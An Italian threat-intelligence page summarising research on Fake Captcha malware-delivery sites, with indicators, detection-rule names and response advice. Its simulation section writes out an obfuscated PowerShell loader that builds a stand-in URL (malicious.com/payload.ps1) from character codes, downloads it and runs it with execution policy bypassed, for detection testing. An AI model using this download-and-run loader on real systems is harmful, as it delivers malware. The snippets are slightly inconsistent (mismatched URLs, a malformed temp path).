Segui
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Il rapporto esamina un ecosistema su larga scala di “Fake Captcha” che sfrutta interfacce di verifica web fidate per distribuire payload dannosi. La somiglianza visiva nelle esche non è un segnale di attribuzione affidabile, poiché lo stesso modello front-end può trovarsi sopra diverse catene di esecuzione: PowerShell, VBScript, installatori MSI e distribuzione di notifiche push guidate dal server. Utilizzando hash percettivi ad alto volume degli screenshot, l’analisi mappa come è organizzato l’ecosistema e sottolinea la separazione tra l’interfaccia utente e il flusso di lavoro del payload sottostante. Si consiglia ai difensori di superare gli indicatori cosmetici e di dare priorità alla rilevazione della logica di esecuzione e dell’infrastruttura.
Indagine
Censys ha identificato 9.494 asset Fake Captcha e ha utilizzato l’hashing percettivo per raggrupparli per somiglianza visiva, trovando un cluster dominante simile a Cloudflare che rappresenta circa il 70% dei siti osservati. Una revisione più approfondita ha scoperto 32 varianti di payload distinti che abbracciano script gestiti dalla clipboard, installatori basati su MSI e una distribuzione push in stile Matrix Push C2. L’analisi dell’infrastruttura ha mostrato pool di server backend separati a supporto di ciascuna tecnica, con esempi citati che includono 95.164.53.115 e ghost.nestdns.com.
Mitigazione
Il rilevamento non dovrebbe dipendere solo dalle caratteristiche visive delle esche o dal comportamento della clipboard. Invece, monitorare suggerimenti di autorizzazione insoliti per notifiche del browser, modelli di download ed esecuzione di PowerShell o VBScript, lanci di MSI provenienti da URL a tema verifica e il traffico di rete associato a noti endpoint Matrix Push C2. Bloccare o isolare le pagine di verifica sospette e formare gli utenti a concedere le autorizzazioni del browser solo su siti fidati e attesi.
Risposta
Quando si incontra una pagina Fake Captcha, avvisare in caso di esecuzione successiva di PowerShell, VBScript o MSI, così come eventi di sottoscrizione alle notifiche. Correlare l’attività degli endpoint con indicatori di rete come gli IP e i domini malevoli citati. Isolare i sistemi impattati, catturare la memoria volatile ed eseguire analisi forensi su eventuali payload recuperati.
Flusso di Attacco
Stiamo ancora aggiornando questa parte. Iscriviti per essere notificato
NotificamiRilevamenti
Scarica o Carica via Powershell (tramite cmdline)
Visualizza
Download Suspicious File Direct IP (tramite proxy)
Visualizza
LOLBAS WScript / CScript (tramite process_creation)
Visualizza
Elaborazione Pacchetto Msiexec senza Estensione MSI (tramite cmdline)
Visualizza
IOC (SourceIP) da rilevare: Living Off the Web: How Trust Infrastructure Became a Malware Delivery Interface
Visualizza
IOC (DestinationIP) da rilevare: Living Off the Web: How Trust Infrastructure Became a Malware Delivery Interface
Visualizza
Rileva Download di PowerShell Usando Net.WebClient.DownloadFile con Offuscamento [Windows Powershell]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Preliminare di Telemetria e Base deve essere stato completato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a misdiagnosi.
-
Narrazione d’Attacco & Comandi:
L’attaccante deve recuperare un payload malevolo nascondendo l’URL di download. Costruiscono l’URL in fase di esecuzione utilizzando codici carattere, incorporano la stringa “enc” (spesso vista in payload codificati in Base64), e poi impieganoNet.WebClient.DownloadFileper recuperare lo script. Questa tecnica corrisponde all’attenzione della regola su “offuscamento + Net.WebClient”. Passaggi:- Generare l’URL di download tramite ricostruzione dei caratteri:
$url = ([char]65+[char]108+[char]105+[char]99+[char]101+[char]46+[char]99+[char]111+[char]109) + "/malware.ps1" - Creare una variabile segnaposto contenente la stringa “enc” per soddisfare il secondo termine di rilevamento:
$encTag = "enc" - Richiamare il download:
$wc = New-Object System.Net.WebClient $wc.DownloadFile($url, "$env:TEMPpayload.ps1") - Eseguire il payload scaricato (opzionale per il test):
powershell -ExecutionPolicy Bypass -File "$env:TEMPpayload.ps1"
La presenza di
Net.WebClient.DownloadFile, della parolaenc, e l’uso di[char]::FromCharCode(tramite l’abbreviazione[char]) garantisce l’attivazione della regola. - Generare l’URL di download tramite ricostruzione dei caratteri:
-
Script di Test di Regressione:
# ------------------------------------------------- # Loader PowerShell simulato – corrisponde alla regola Sigma # ------------------------------------------------- # 1. Ricostruire l'URL di download usando i codici carattere $url = ([char]104+[char]116+[char]116+[char]112+[char]115+[char]58+[char]47+[char]47+[char]109+[char]97+[char]108+[char]105+[char]99+[char]105+[char]111+[char]117+[char]115+[char]46+[char]99+[char]111+[char]109+[char]47+[char]112+[char]97+[char]121+[char]108+[char]111+[char]97+[char]100+[char]46+[char]112+[char]115+[char]49) # L'insieme sopra menziona: https://malicious.com/payload.ps1 # 2. Inserire il token "enc" per soddisfare la regola di rilevamento $encTag = "enc" # 3. Effettuare il download $wc = New-Object System.Net.WebClient $destination = "$env:TEMPpayload.ps1" $wc.DownloadFile($url, $destination) # 4. (Opzionale) Eseguire il payload # powershell -ExecutionPolicy Bypass -File $destination -
Comandi di Pulizia:
# Rimuovere il payload scaricato $payloadPath = "$env:TEMPpayload.ps1" if (Test-Path $payloadPath) { Remove-Item -Force $payloadPath } # Rimuovere l'oggetto WebClient (raccolta spazzatura gestita automaticamente) Write-Host "Pulizia completata."